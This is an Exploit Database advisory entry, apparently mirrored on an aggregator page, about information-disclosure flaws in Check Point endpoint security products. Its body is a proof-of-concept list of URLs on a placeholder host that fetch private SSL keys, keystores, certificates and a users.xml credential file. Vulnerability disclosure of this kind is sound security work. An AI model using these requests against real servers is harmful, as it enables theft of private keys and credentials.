Multiple Check Point Endpoint Security Products – Information Disclosure

• Exploit Database
• 17 阅读

• 作者： Rapid7
  日期： 2011-02-07
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/35317/

• source: https://www.securityfocus.com/bid/46224/info
  
  Multiple Check Point endpoint security products are prone to multiple information-disclosure vulnerabilities.
  
  Attackers can exploit these issues to harvest sensitive information that may lead to further attacks. 
  
  http://www.example.com/conf/ssl/apache/integrity-smartcenter.cert
  http://www.example.com/conf/ssl/apache/integrity-smartcenter.key
  http://www.example.com/conf/ssl/apache/integrity.cert
  http://www.example.com/conf/ssl/apache/integrity.key
  http://www.example.com/conf/ssl/apache/smartcenter.cert
  http://www.example.com/conf/ssl/integrity-keystore.jks
  http://www.example.com/conf/ssl/isskeys.jks
  http://www.example.com/conf/ssl/openssl.pem
  http://www.example.com/conf/integrity.xml
  http://www.example.com/conf/jaas/users.xml
  http://www.example.com/bin/DBSeed.xml
  http://www.example.com:8080/conf/ssl/apache/integrity-smartcenter.cert